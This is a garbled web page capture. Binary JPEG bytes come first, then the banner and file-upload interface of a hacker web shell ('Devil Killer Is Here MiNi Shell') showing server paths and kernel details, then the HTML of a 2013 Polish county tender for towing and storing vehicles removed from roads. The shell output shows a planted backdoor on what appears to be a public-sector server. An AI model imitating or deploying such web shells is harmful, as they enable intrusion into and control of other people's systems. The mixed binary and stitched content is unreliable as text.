JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130114/7479-N-2013.html

<p class="kh_header"><b>Mikołów: Świadczenie kompleksowych usług w zakresie całodobowego usuwania pojazdów z drogi na terenie Powiatu Mikołowskiego, całodobowego przechowywania na parkingu strzeżonym pojazdów usuniętych z drogi, całodobowego przechowywania na parkingu strzeżonym pojazdów przewożących materiały niebezpieczne usuniętych z drogi,  w przypadkach przewidzianych w art. 130a ust. 1 i 2 ustawy z dnia 20 czerwca 1997r.-Prawo o ruchu drogowym.</b><br>
<b>Numer ogłoszenia: 7479 - 2013; data zamieszczenia: 14.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Mikołowskiego , ul. Żwirki i Wigury 4a, 43-190 Mikołów, woj. śląskie, tel. (032) 32-48-100,  32-48-125, faks (032) 32-48-147, 32-48-132.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mikolowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie kompleksowych usług w zakresie całodobowego usuwania pojazdów z drogi na terenie Powiatu Mikołowskiego, całodobowego przechowywania na parkingu strzeżonym pojazdów usuniętych z drogi, całodobowego przechowywania na parkingu strzeżonym pojazdów przewożących materiały niebezpieczne usuniętych z drogi,  w przypadkach przewidzianych w art. 130a ust. 1 i 2 ustawy z dnia 20 czerwca 1997r.-Prawo o ruchu drogowym..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem  i zakresem zamówienia jest: świadczenie kompleksowych usług w zakresie całodobowego usuwania pojazdów z drogi na terenie Powiatu Mikołowskiego, całodobowego przechowywania na parkingu strzeżonym pojazdów usuniętych z drogi, całodobowego przechowywania na parkingu strzeżonym pojazdów przewożących materiały niebezpieczne usuniętych z drogi,  w przypadkach przewidzianych w art. 130a ust. 1 i 2 ustawy z dnia 20 czerwca 1997r.-Prawo o ruchu drogowym.
Przedmiot zamówienia obejmuje trzy zadania.
Zadanie I : Świadczenie kompleksowych usług w zakresie całodobowego usuwania pojazdów z drogi na terenie Powiatu Mikołowskiego w przypadkach przewidzianych w art. 130a ust. 1 i 2 ustawy z dnia 20 czerwca 1997r.-Prawo o ruchu drogowym.
Zadanie obejmuje następujący zakres: 
1) usługa świadczona będzie całodobowo przez 7 dni w tygodniu i polegać będzie na holowaniu z miejsca zdarzenia na wskazany parking strzeżony pojazdów usuniętych z drogi w przypadkach określonych w art. 130a ust. 1 i 2 ustawy Prawo o ruchu drogowym. 
2)Zakres podstawowych czynności wchodzących w skład usługi transportowej (bez względu na warunki atmosferyczne, porę dnia lub nocy, oraz utrudnienia wynikające z ukształtowania terenu, warunków zabudowy itp.) obejmuje: 
a) przyjęcie zlecenia przyjazdu pojazdu holującego, 
b )dojazd do miejsca wskazanego w dyspozycji oraz podjęcie czynności usunięcia z drogi pojazdu w czasie nie dłuższym niż 30 minut od chwili otrzymania dyspozycji;
c) przygotowanie pojazdu lub pojazdów i jego elementów do załadunku (wszelkie prace
towarzyszące przygotowaniu pojazdu do transportu), 
d)załadunek pojazdu (części pojazdu) na zestaw holujący, 
e)dojazd z pojazdem transportowanym na wskazany parking, 
f) rozładunek i zaparkowanie pojazdu na parkingu, 
g)uporządkowanie miejsca zdarzenia z odpadków szkła, metalu i innych części pojazdu lub jego
ładunku nie wymagających użycia specjalistycznego sprzętu znajdującego się w pojazdach do
tego przeznaczonych;
3) Czynności związane z odstąpieniem od wykonania dyspozycji usunięcia pojazdu z drogi, która obejmuje:
a) dojazd do miejsca wskazanego w dyspozycji i odstąpienie od jej wykonania bez podjęcia czynności załadunku;
b) dojazd do miejsca wskazanego w dyspozycji , rozpoczęcie czynności załadunkowych i następnie odstąpienie od wykonania dyspozycji;
4) Wykonawca będzie zobowiązany do realizacji każdego zlecenia usunięcia pojazdu z drogi na wniosek osób do tego upoważnionych zgodnie z art. 130a ust. 4 ustawy-Prawo o ruchu drogowym. 
( dyspozycyjność przez 24 godziny/dobę przez 7 dni w tygodniu).
5) Usługę należy wykonać za pomocą sprzętu specjalistycznego, odpowiednio oznakowanego, w odpowiedniej ilości umożliwiającej sprawne i ciągłe usuwanie pojazdów z miejsc zlokalizowanych na terenie Powiatu Mikołowskiego w możliwie jak najkrótszym czasie.

Szacunkowy zakres zamówienia dla zadania I zawiera załącznik nr 2 do SIWZ -  Kalkulacja cenowa przedmiotu zamówienia. 

 Zadanie II : Świadczenie kompleksowych usług w zakresie całodobowego przechowywania na parkingu strzeżonym pojazdów usuniętych z drogi w przypadkach określonych w art. 130a ust. 1 i 2 ustawy z dnia 20 czerwca 1997r.-Prawo o ruchu drogowym.
Zadanie obejmuje następujący zakres: 
a) Przyjęcie pojazdu na parkingu i jego odpowiednie zabezpieczenia przed zniszczeniem w czasie jego przechowywania, w szczególności pojazdów z uszkodzeniami powypadkowymi;
b) Sprawowanie całodobowego nadzoru nad przyjętym pojazdem do momentu jego odbioru przez osobę wskazaną w zezwoleniu lub do ostatecznego zbycia albo zniszczenia pojazdu przez Zamawiającego.
c) Wydanie pojazdu osobie uprawnionej na podstawie zezwolenia wystawionego przez podmiot do tego upoważniony, po okazaniu dowodu uiszczenia opłaty za usunięcie pojazdu oraz jego przechowywanie na parkingu strzeżonym;
d) Informowanie Zamawiającego oraz podmiotu wydającego dyspozycję usunięcia, o fakcie nieodebrania pojazdu z parkingu po upływie 3 miesięcy od momentu jego usunięcia, jednak nie później niż 3-go dnia od upływu tego terminu, zgodnie z art. 130a ust. 10 i 10g ustawy-Prawo o ruchu drogowym;
3) Parking strzeżony na którym będą przechowywane pojazdy usunięte z drogi musi spełniać następujące  minimalne parametry : 
-nieruchomość utwardzona ( asfalt,beton, kostka ), 
-trwale ogrodzony (siatka, parkan), 
- oświetlony, 
- dozorowany przez całą dobę ( monitoring elektroniczny lub ochrona fizyczna), 
- wyposażony w sprzęt przeciwpożarowy, 
- zamykany w sposób uniemożliwiający wjazd i wyjazd środka transportu bez zezwolenia osoby dozorującej, 
- umożliwiający przechowywanie wszystkich sukcesywnie usuwanych na mocy art. 130a ust. 1 i 2 ustawy - Prawo o ruchu drogowym ,z dróg powiatu mikołowskiego pojazdów, tj.: rowerów , motorowerów, motocykli, pojazdów o dopuszczalnej masie całkowitej do 3,5 t, pojazdów o dopuszczalnej masie całkowitej od 3,5 t do 7,5 t, pojazdów o dopuszczalnej masie całkowitej od 7,5 t do 16 t, pojazdów o dopuszczalnej masie całkowitej powyżej 16 t, 
-  oznakowany tablicą informacyjną 
-  posiadający  łącznie następującą liczbę miejsc do parkowania 
pojazdów:
a) o dmc do 3,5 t- minimum 25 miejsc;
b) o dmc powyżej 3,5 tony - minimum 6 miejsc;

Szacunkowy zakres zamówienia dla zadania II zawiera załącznik nr 3 do SIWZ -  Kalkulacja cenowa przedmiotu zamówienia. 

Zadanie III : Świadczenie kompleksowych usług w zakresie całodobowego przechowywania na parkingu strzeżonym pojazdów przewożących materiały niebezpieczne, usuniętych z drogi w przypadkach określonych w art. 130a ust. 1 i 2 ustawy z dnia 20 czerwca 1997r.-Prawo o ruchu drogowym.
Zadanie obejmuje następujący zakres:
a) Przyjęcie pojazdu na parkingu i jego odpowiednie zabezpieczenia przed zniszczeniem w czasie jego przechowywania, w szczególności pojazdów z uszkodzeniami powypadkowymi;
b) Sprawowanie całodobowego nadzoru nad przyjętym pojazdem do momentu jego odbioru przez osobę wskazaną w zezwoleniu lub do ostatecznego zbycia pojazdu przez Zamawiającego.
c) Wydanie pojazdu osobie uprawnionej na podstawie zezwolenia wystawionego przez podmiot do tego upoważniony, po okazaniu dowodu uiszczenia opłaty za usunięcie pojazdu oraz jego przechowywanie na parkingu strzeżonym;
d) Informowanie Zamawiającego oraz podmiotu wydającego dyspozycję usunięcia, o fakcie nieodebrania pojazdu z parkingu po upływie 3 miesięcy od momentu jego usunięcia, jednak nie później niż 3-go dnia od upływu tego terminu, zgodnie z art. 130a ust. 10 i 10g ustawy-Prawo o ruchu drogowym;
e) Parking strzeżony na którym będą przechowywane pojazdy przewożące materiały niebezpieczne musi spełniać warunki techniczne określone przez  rozporządzenie Ministra Spraw Wewnętrznych z dnia 13 listopada 2012r. w sprawie warunków technicznych parkingów, na które są usuwane pojazdy przewożące towary niebezpieczne (Dz. U. z dnia 23 listopada 2012r. poz. 1293 )- treść rozporządzenia stanowi załącznik nr 4 do SIWZ.
Szacunkowy zakres zamówienia dla zadania III zawiera załącznik nr 3a do SIWZ -  Kalkulacja cenowa przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 63.71.24.00-7, 98.35.11.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania krajowego transportu drogowego rzeczy, zgodnie z przepisami ustawy z dnia 06.09.2001  roku - O transporcie drogowy - dotyczy tylko zadania I.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują: 
- minimum dwoma pojazadmi przystosowanymi do usuwania pojazdów do 3,5 tony;
- minimum jednym pojazdem przystosowanym do usuwania pojazdów powyżej 3,5 tony tj. o dmc powyżej 3,5 tony do 16 ton i powyżej 16 ton;- dotyczy tylko zadania I.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie opisuje tego warunku.
Zgodnie z art. 26 ust. 2b ustawy Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 

II. Inne warunki, które musi spełniać Wykonawca.
Brak podstaw do wykluczenia wykonawcy z powodu niespełnienia warunków, o których mowa w art.24 ust.1 ustawy Prawo Zamówień Publicznych.

Ocena spełniania poszczególnych warunków  przez Wykonawców zostanie dokonana na podstawie złożonej oferty oraz złożonych przez wykonawców oświadczeń i dokumentów, wymaganych przez Zamawiającego w SIWZ i zostanie przeprowadzona zgodnie z formułą  spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.W zakresie potwierdzenia, że oferowane dostawy, usługi odpowiadają określonym przez Zamawiajacego wymaganiom opisanym w punkcie 3) dla zadania II  ,Wykonawca musi załączyć:
1) charakterystykę techniczną parkingu, na którym Wykonawca będzie przechowywał pojazdy usunięte z drogi zawierające następujące informacje: lokalizacja parkingu ( adres), rodzaj nawierzchni,rodzaj ogrodzenia,sposób dozorowania, rodzaj oświetlenia,sposób zabezpieczenia przed  wjazdem i wyjazdem środka transportu bez zezwolenia osoby dozorującej,wyposażenie przeciwpożarowe, sposób oznakowania parkingu, liczbę miejsc do parkowania pojazdów:a) o dmc do 3,5 t, b) o dmc powyżej 3,5 tony;  
2.W zakresie potwierdzenia, że oferowane dostawy, usługi odpowiadają określonym przez Zamawiającego wymaganiom opisanym w punkcie e) dla zadania III  ,Wykonawca musi załączyć:
1) oświadczenie Wykonawcy o dysponowaniu parkingiem spełniającym wymagania techniczne określone przez  rozporządzenie Ministra Spraw Wewnętrznych z dnia 13 listopada 2012r. w sprawie warunków technicznych parkingów, na które są usuwane pojazdy przewożące towary niebezpieczne (Dz. U. z dnia 23 listopada 2012r. poz. 1293 ) - wzór oświadczenia stanowi załącznik nr 10 do SIWZ.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1). wypełniony i podpisany formularz ofertowy stanowiący zał. nr  1  do SIWZ dla Zadania I ; 
2) wypełniony i podpisany załącznik nr 2 do SIWZ -  kalkulacja cenowa przedmiotu zamówienia - dla zadania I;
3). wypełniony i podpisany formularz ofertowy stanowiący zał. nr  1a  do SIWZ dla Zadania II ; 
4) wypełniony i podpisany załącznik nr 3 do SIWZ -  kalkulacja cenowa przedmiotu zamówienia - dla zadania II;
5) wypełniony i podpisany załącznik nr 3a do SIWZ - kalkulacja cenowa przedmiotu zamówienia - dla zadania III;
6) wypełniony i podpisany formularz ofertowy stanowiący załącznik nr 1b do SIWZ - dla zadania III; 
7) Jeżeli oferta podpisana jest przez osobę inną niż upoważniona do reprezentowania wykonawcy do oferty należy załączyć pełnomocnictwo (upoważnienie) w formie oryginału podpisane przez osoby uprawnione do reprezentowania wykonawcy lub w formie kopii poświadczonej notarialnie; 
8)w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia pełnomocnictwo/upoważnieniem dla pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia  albo reprezentowania w postępowaniu i zawarcia umowy  w sprawie zamówienia publicznego. Pełnomocnictwo musi być w formie oryginału lub w formie kopii poświadczonej notarialnie; dotyczy wszystkich zadań. 
9) w przypadku gdy Wykonawca polega na wiedzy i doświadczeniu , osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów Wykonawca zobowiązany jest do przedstawienia pisemnego zobowiązania tych podmiotów ( np. pisemne oświadczenie podmiotu trzeciego, umowa przedwstępna, umowa generalna o współpracy ) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany umowy możliwe są jedynie w trybie art. 144 ustawy-Prawo zamówień publicznych. Uzgodnienia w tym zakresie wymagają dla swojej ważności zatwierdzenia przez Zamawiającego a zmiana umowy może nastąpić jedynie na piśmie w formie aneksu, pod rygorem nieważności.
2. Zamawiający, zgodnie z art. 144 ust.1 ustawy przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wystąpienia.
2.1.Zamawiający przewiduje możliwość zmiany umowy w przypadku:
a) zmiany obowiązującej stawki VAT:
- jeżeli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający żąda zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez Wykonawcę.
b) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.
3. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, jednocześnie nie stanowią one zobowiązania do wyrażenia takiej zgody.
Nie stanowią zmiany umowy w rozumieniu art. 144 ustawy z dnia 29 stycznia 2004r- Prawo zamówień publicznych ( t.j. Dz.U. Z 2010 nr 113, poz.759 ze zm.):
a) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy
(np. zmiana rachunku bankowego);
b) zmiana danych teleadresowych, zmiana osób wskazanych do kontaktów między stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mikolowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Mikolowie, ul.Żwirki i Wigury 4a, 43 - 190 Mikołów, wejście B,parter,Biuro Podawcze, osobiście lub za zaliczeniem pocztowym, cena: 5 PLN plus koszt wysyłki..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2013 godzina 09:00, miejsce: Starostwo Powiatowe w Mikolowie, ul.Żwirki i Wigury 4a, 43 - 190 Mikołów, wejście B,parter,pokój nr 127 - kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 20.02.2013.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie kompleksowych usług w zakresie całodobowego usuwania pojazdów z drogi na terenie Powiatu Mikołowskiego w przypadkach przewidzianych w art. 130a ust. 1 i 2 ustawy z dnia 20 czerwca 1997r.-Prawo o ruchu drogowym..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie I :Świadczenie kompleksowych usług w zakresie całodobowego usuwania pojazdów z drogi na terenie Powiatu Mikołowskiego w przypadkach przewidzianych w art. 130a ust. 1 i 2 ustawy z dnia 20 czerwca 1997r.-Prawo o ruchu drogowym.
Zadanie obejmuje następujący zakres: 
1) usługa świadczona będzie całodobowo przez 7 dni w tygodniu i polegać będzie na holowaniu z miejsca zdarzenia na wskazany parking strzeżony pojazdów usuniętych z drogi w przypadkach określonych w art. 130a ust. 1 i 2 ustawy Prawo o ruchu drogowym. 
2)Zakres podstawowych czynności wchodzących w skład usługi transportowej (bez względu na warunki atmosferyczne, porę dnia lub nocy, oraz utrudnienia wynikające z ukształtowania terenu, warunków zabudowy itp.) obejmuje: 
